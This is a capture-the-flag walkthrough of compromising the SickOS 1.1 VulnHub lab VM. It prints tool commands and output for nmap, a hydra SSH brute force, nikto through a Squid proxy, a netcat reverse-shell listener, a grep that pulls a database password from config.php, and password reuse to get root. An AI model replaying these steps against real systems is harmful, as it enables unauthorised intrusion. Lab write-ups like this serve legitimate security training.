Rooting SickOS 1.1
Setup: SickOS 1.1 downloaded from vulnhub, installed on a host only network in Virtualbox. First, we'll run a host discovery tool to sniff for ARP packets and figure out the target IP address:
root@HAL9000:/home/Dave/Pentest-Lab/SickOS1.1# netdiscover -i vboxnet0 Currently scanning: 192.168.91.0/16 | Screen View: Unique Hosts 2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.100 08:00:27:b2:06:3e 1 60 PCS Systemtechnik GmbH 192.168.56.101 08:00:27:cd:d5:49 1 42 PCS Systemtechnik GmbH
Now that we know the IP address (192.168.56.100 is the DHCP server), I'll run a Python enumeration script I wrote as a wrapper for various enumeration tools, available here: https://gist.github.com/phi10s/f19d10e84eae9ce52c31eaf085aef68e):
root@HAL9000:/home/Dave/Pentest-Lab/SickOS1.1# enumit 192.168.56.101 _____ ___ _ | ____|_ __ _ _ _ __ ___ |_ _| |_ _ __ _ _ | _| | '_ \| | | | '_ ` _ \ | || __| | '_ \| | | | | |___| | | | |_| | | | | | || || |_ _| |_) | |_| | |_____|_| |_|\__,_|_| |_| |_|___|\__(_) .__/ \__, | |_| |___/ By phi10s ___ _ ___ | _ \___ _ _| |_/ __| __ __ _ _ _ | _/ _ \ '_| _\__ \/ _/ _` | ' \ |_| \___/_| \__|___/\__\__,_|_||_| [+] Beginning initial Nmap scan. This may take a few minutes. Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-09 11:02 CST Nmap scan report for 192.168.56.101 Host is up (0.00036s latency). Not shown: 1000 open|filtered ports, 997 filtered ports PORT STATE SERVICE 22/tcp open ssh 3128/tcp open squid-http 8080/tcp closed http-proxy MAC Address: 08:00:27:CD:D5:49 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds [+] Running Nmap script scans on open ports. Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-09 11:02 CST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Stats: 0:01:47 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 11:05 (0:01:08 remaining) Nmap scan report for 192.168.56.101 Host is up (0.00016s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA) | 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA) |_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA) 3128/tcp open http-proxy Squid http proxy 3.1.19 |_http-server-header: squid/3.1.19 |_http-title: ERROR: The requested URL could not be retrieved 22/udp open|filtered ssh 3128/udp open|filtered ndl-aas MAC Address: 08:00:27:CD:D5:49 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 649.20 seconds |_ _| |_ ___ _ _ ___ _ _ __ _| |_ / __| __ __ _ _ _ | | | ' \/ _ \ '_/ _ \ || / _` | ' \ \__ \/ _/ _` | ' \ |_| |_||_\___/_| \___/\_,_\__, |_||_| |___/\__\__,_|_||_| |___/ [+] Beginning Nmap scan of all TCP ports. Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-09 11:12 CST Initiating ARP Ping Scan at 11:12 Scanning 192.168.56.101 [1 port] Completed ARP Ping Scan at 11:12, 0.07s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 11:12 Completed Parallel DNS resolution of 1 host. at 11:13, 6.54s elapsed Initiating SYN Stealth Scan at 11:13 Scanning 192.168.56.101 [65535 ports] Discovered open port 22/tcp on 192.168.56.101 Discovered open port 3128/tcp on 192.168.56.101 SYN Stealth Scan Timing: About 22.98% done; ETC: 11:15 (0:01:44 remaining) SYN Stealth Scan Timing: About 59.35% done; ETC: 11:14 (0:00:42 remaining) Completed SYN Stealth Scan at 11:14, 87.34s elapsed (65535 total ports) Nmap scan report for 192.168.56.101 Host is up (0.00033s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp open ssh 3128/tcp open squid-http 8080/tcp closed http-proxy MAC Address: 08:00:27:CD:D5:49 (Oracle VirtualBox virtual NIC) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 94.11 seconds Raw packets sent: 131136 (5.770MB) | Rcvd: 72 (2.876KB) [+] Beginning Nmap scan of all UDP ports. Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-09 11:14 CST Initiating ARP Ping Scan at 11:14 Scanning 192.168.56.101 [1 port] Completed ARP Ping Scan at 11:14, 0.07s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 11:14 Completed Parallel DNS resolution of 1 host. at 11:14, 0.04s elapsed Initiating UDP Scan at 11:14 Scanning 192.168.56.101 [65535 ports] Completed UDP Scan at 11:36, 1314.19s elapsed (65535 total ports) Nmap scan report for 192.168.56.101 Host is up (0.00027s latency). All 65535 scanned ports on 192.168.56.101 are open|filtered MAC Address: 08:00:27:CD:D5:49 (Oracle VirtualBox virtual NIC) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 1314.44 seconds Raw packets sent: 131071 (3.674MB) | Rcvd: 1 (28B) [+] All Done!
So, we only have two open ports, an ssh server on port 22 and an http proxy on port 3128. I try to navigate to the http proxy port in a web browser, but am immediately met with an error message. I'll try a dictionary attack on the ssh server while searching Google for more information about OpenSSH 5.9p1 and Squid 3.1.19.
root@HAL9000:/home/Dave/Pentest-Lab/SickOS1.1# hydra -L /usr/share/seclists/Usernames/top_shortlist.txt -P /usr/share/seclists/Passwords/500-worst-passwords.txt 192.168.56.101 ssh -t10 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-02-09 13:02:43 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 10 tasks per 1 server, overall 10 tasks, 5489 login tries (l:11/p:499), ~549 tries per task [DATA] attacking ssh://192.168.56.101:22/ [STATUS] 160.00 tries/min, 160 tries in 00:01h, 5329 to do in 00:34h, 10 [STATUS] 82.55 tries/min, 410 tries in 00:04h, 5079 to do in 01:02h, 10 active [STATUS] 118.88 tries/min, 1066 tries in 00:08h, 4423 to do in 00:38h, 10 active [STATUS] 134.73 tries/min, 2286 tries in 00:16h, 3203 to do in 00:24h, 10 active [STATUS] 144.12 tries/min, 4751 tries in 00:32h, 738 to do in 00:06h, 10 active [STATUS] 144.57 tries/min, 5489 tries in 00:37h, 1 to do in 00:01h, 5 active 1 of 1 target completed, 0 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2018-02-09 13:40:53
No passwords found, but through my web research I discovered a potential buffer overflow exploit for Squid proxy version 3.x, available as a Metasploit module. I open up MSFConsole and search for the exploit:
=[ metasploit v4.16.34-dev ] + -- --=[ 1730 exploits - 990 auxiliary - 300 post ] + -- --=[ 509 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > search squid Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/http/squid_pivot_scanning normal Squid Proxy Port Scanner exploit/linux/proxy/squid_ntlm_authenticate 2004-06-08 great Squid NTLM Authenticate Overflow
My exploit attempt fails, but I decide to use the other matching module, "squid_pivot_scanning," to see what I can turn up:
msf auxiliary(scanner/http/squid_pivot_scanning) > run [+] [192.168.56.101] 192.168.56.101 is alive but 21 is CLOSED [+] [192.168.56.101] 192.168.56.101:80 seems OPEN
It turns out the proxy is hiding a web server on port 80. Time for some in-depth web scanning. I'll use Nikto's built in proxy capability to traverse the Squid proxy and scan the webserver:
root@HAL9000:/home/Dave/Pentest-Lab/SickOS1.1# nikto -host 192.168.56.101 -port 80 -useproxy http://192.168.56.101:3128 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.56.101 + Target Hostname: 192.168.56.101 + Target Port: 80 + Proxy: 192.168.56.101:3128 + Start Time: 2018-02-09 13:21:09 (GMT-6) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + Retrieved via header: 1.0 localhost (squid/3.1.19) + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'x-cache' found, with contents: MISS from localhost + Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Server leaks inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec 4 18:35:02 2015 + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0 + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php + Uncommon header 'nikto-added-cve-2014-6271' found, with contents: true + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3233: /icons/README: Apache default file found. + 8347 requests: 0 error(s) and 21 item(s) reported on remote host + End Time: 2018-02-09 13:21:20 (GMT-6) (11 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
What immediately jumps out is the potential Shellshock vulnerability on the /cgi-bin/status page. In order to play around with this, I'll fire up BurpSuite and add the target IP/proxy port as an upstream proxy in the User Options tab:
I then set Burp as a proxy in my browser preferences, browse to the potentially vulnerable page, capture the HTTP request and send it to the Repeater tab to mess around with:
The Shellshock vulnerability can often be exploited through certain HTTP header parameters such as the User-Agent string. We will need to find a proof of concept that will allow us to execute code on the target. We have two CVE numbers referenced in the Nikto output, CVE-2014-6271, and CVE-2014-6278, so I first checked out the https://github.com/mubix/shellshocker-pocs and tried the pocs matching the CVE numbers, but they did not work as-is. I received a different sort of error message upon sending the payloads, so I knew they were causing something to happen, but I saw no output indicating command execution. It took some time to find a payload that actually resulted in full remote command execution:
Alright. Now that there is demonstrable command execution, we can get a reverse shell:
Meanwhile, I had a listener on port 443 waiting for a shell:
root@HAL9000:/home/Dave/Pentest-Lab/SickOS1.1# nc -nvlp 443 listening on [any] 443 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.101] 54434 bash: no job control in this shell www-data@SickOs:/usr/lib/cgi-bin$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data)
I then downloaded and ran the linuxprivchecker.py local enumeration script on the target. I noticed a whole lot of output pertaining to something called Wolfcms. Here's a snippet:
[+] World Writable Files -rw-rw-rw- 1 root root 0 Feb 10 2018 /sys/kernel/security/apparmor/.access -rwxrwxrwx 1 root root 120 Oct 2 2014 /usr/lib/cgi-bin/status -rwxrwxrwx 1 root root 403 Dec 5 2015 /var/www/wolfcms/composer.json -rwxrwxrwx 1 root root 2405 Dec 5 2015 /var/www/wolfcms/README.md -rwxrwxrwx 1 root root 6815 Dec 5 2015 /var/www/wolfcms/index.php -rwxrwxrwx 1 root root 3058 Dec 5 2015 /var/www/wolfcms/config.php
One line in particular stands out. The config.php file often contains database credentials, and the script also revealed a MySQL server on the target, so let's check it out!
www-data@SickOs:/usr/lib/cgi-bin$ find / -name config.php -exec grep DB {} \; 2>/dev/null <i-bin$ find / -name config.php -exec grep DB {} \; 2>/dev/null define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306'); define('DB_USER', 'root'); define('DB_PASS', 'john@123'); www-data@SickOs:/usr/lib/cgi-bin$
It always pays to check for reuse of passwords across different services and logins. Now that we have enumerated users (root and sickos), and have a password for the database, let's try to log in via ssh.
root@HAL9000:/home/Dave/Pentest-Lab/SickOS1.1# ssh root@192.168.56.101 root@192.168.56.101's password: Permission denied, please try again. root@192.168.56.101's password: Permission denied, please try again. root@192.168.56.101's password: root@192.168.56.101: Permission denied (publickey,password). root@HAL9000:/home/Dave/Pentest-Lab/SickOS1.1# ssh sickos@192.168.56.101 sickos@192.168.56.101's password: Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686) * Documentation: https://help.ubuntu.com/ System information as of Sat Feb 10 04:13:14 IST 2018 System load: 0.0 Processes: 109 Usage of /: 4.3% of 28.42GB Users logged in: 0 Memory usage: 10% IP address for eth0: 192.168.56.101 Swap usage: 0% Graph this data and manage this system at: https://landscape.canonical.com/ 124 packages can be updated. 92 updates are security updates. New release '14.04.3 LTS' available. Run 'do-release-upgrade' to upgrade to it. Last login: Sat Feb 10 04:08:41 2018 from 192.168.56.1 sickos@SickOs:~$
Didn't work for root, but we got in as sickos. Now, if we're lucky...
sickos@SickOs:~$ sudo -l [sudo] password for sickos: Matching Defaults entries for sickos on this host: env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User sickos may run the following commands on this host: (ALL : ALL) ALL sickos@SickOs:~$ sudo su root@SickOs:/home/sickos# id uid=0(root) gid=0(root) groups=0(root) root@SickOs:/home/sickos#
Rooted! This is why you don't reuse passwords.
root@SickOs:/home/sickos# cd /root root@SickOs:~# ls a0216ea4d51874464078c618298b1367.txt root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt If you are viewing this!! ROOT! You have Succesfully completed SickOS1.1. Thanks for Trying root@SickOs:~#
Comments
Post a Comment